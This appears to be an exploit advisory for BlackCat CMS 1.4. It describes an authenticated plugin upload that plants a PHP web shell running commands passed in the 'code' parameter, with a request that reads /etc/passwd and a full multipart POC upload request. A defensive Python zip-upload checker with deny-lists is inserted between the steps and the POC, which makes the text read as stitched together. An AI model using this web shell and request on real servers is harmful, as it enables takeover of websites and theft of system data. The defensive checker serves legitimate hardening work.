
BlackCat CMS V1.4 - Remote Code Execution (RCE)

Exploit Title: BlackCat CMS V1.4 - Remote Code Execution (RCE)
Application: BlackCat CMS
Version: V1.4
Bugs: RCE
Technology: PHP
Vendor URL: https://blackcat-cms.org/
Software link: https://github.com/blackcatdevelopment/blackcatcms
Date found: 13.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details / POC
====================================================
Steps:
1. Log in to an administrator account
2. Go to Admin-Tools -> jQuery plugins (http://localhost/blackCatcms-1.4/upload/backend/backend/admintools/tool.php?tool=jquery_plugin_mgr)
3. Upload a zip file; this zip must contain poc.php
poc.php file content:
<?php $a=$_GET['code']; echo system($a);
4. Go to http://localhost/blackcatcms-1.4/upload/lib_jquery/plugins/plagin/poc/poc.php?code=cat%20/etc/passwd
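The root cause in step 3 is that the plugin manager extracts whatever the archive contains into a web-served directory. A server-side check that would reject such an archive before extraction, written here as an added example (not BlackCat CMS code; the deny-list, the helper names and the sample archives are constructed for illustration):

```python
import io
import posixpath
import zipfile

# Server-side extensions and special files a jQuery plugin archive should never ship.
# Hypothetical deny-list; adjust to the handlers your web server actually maps.
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}
DENIED_NAMES = {".htaccess", ".user.ini"}


def archive_violations(zip_bytes: bytes) -> list[str]:
    """Return reasons to reject the archive; an empty list means it is safe to extract."""
    problems = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            norm = posixpath.normpath(name.replace("\\", "/"))
            # Zip-slip: absolute or ".."-relative members would land outside lib_jquery/plugins/.
            if norm.startswith(("/", "..")):
                problems.append(f"path traversal: {name}")
                continue
            if info.is_dir():
                continue
            base = posixpath.basename(norm).lower()
            if base in DENIED_NAMES:
                problems.append(f"server config file: {name}")
                continue
            # Look at every dotted part so "poc.php" and "poc.php.txt" are both caught.
            if EXECUTABLE_EXTS & set(base.split(".")[1:]):
                problems.append(f"executable file: {name}")
    return problems


def build_zip(files: dict[str, bytes]) -> bytes:
    """Build an in-memory zip from {member_name: content}; used only for constructed samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in files.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed samples: a legitimate plugin and two archives the upload handler must refuse.
BENIGN_ZIP = build_zip({"myplugin/jquery.myplugin.min.js": b"/* js */", "myplugin/README.md": b"docs"})
PHP_ZIP = build_zip({"poc/poc.php": b"<?php /* constructed placeholder */ ?>"})
SLIP_ZIP = build_zip({"../../backend/evil.js": b"/* would land outside the plugin dir */"})

if __name__ == "__main__":
    for label, blob in [("benign", BENIGN_ZIP), ("php", PHP_ZIP), ("slip", SLIP_ZIP)]:
        print(label, archive_violations(blob) or "accepted")
```

Combine this with storing extracted plugins where the web server does not execute PHP at all; an extension deny-list alone is only as good as the server's handler configuration.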
POC Request:
POST /blackcatcms-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr HTTP/1.1
Host: localhost
Content-Length: 577
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: 0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybrbyjww3cushocbt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: 1
Sec-Fetch-Dest: document
Referer: http://localhost/blackcatcms-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: cat7288SessionID=7UV7F4KJ7HM9Q6JND6M9M9LUQ0TI
Connection: close

------WebKitFormBoundarybrbyjww3cushocbt
Content-Disposition: form-data; name="upload"

1
------WebKitFormBoundarybrbyjww3cushocbt
Content-Disposition: form-data; name="userfile"; filename="poc.zip"
Content-Type: application/zip

PK... [binary zip bytes] ...poc.php<?php
$a=$_GET['code'];
echo system($a);

[binary zip bytes] ...poc.php
[binary zip bytes]
------WebKitFormBoundarybrbyjww3cushocbt
Content-Disposition: form-data; name="submit"

Upload
------WebKitFormBoundarybrbyjww3cushocbt--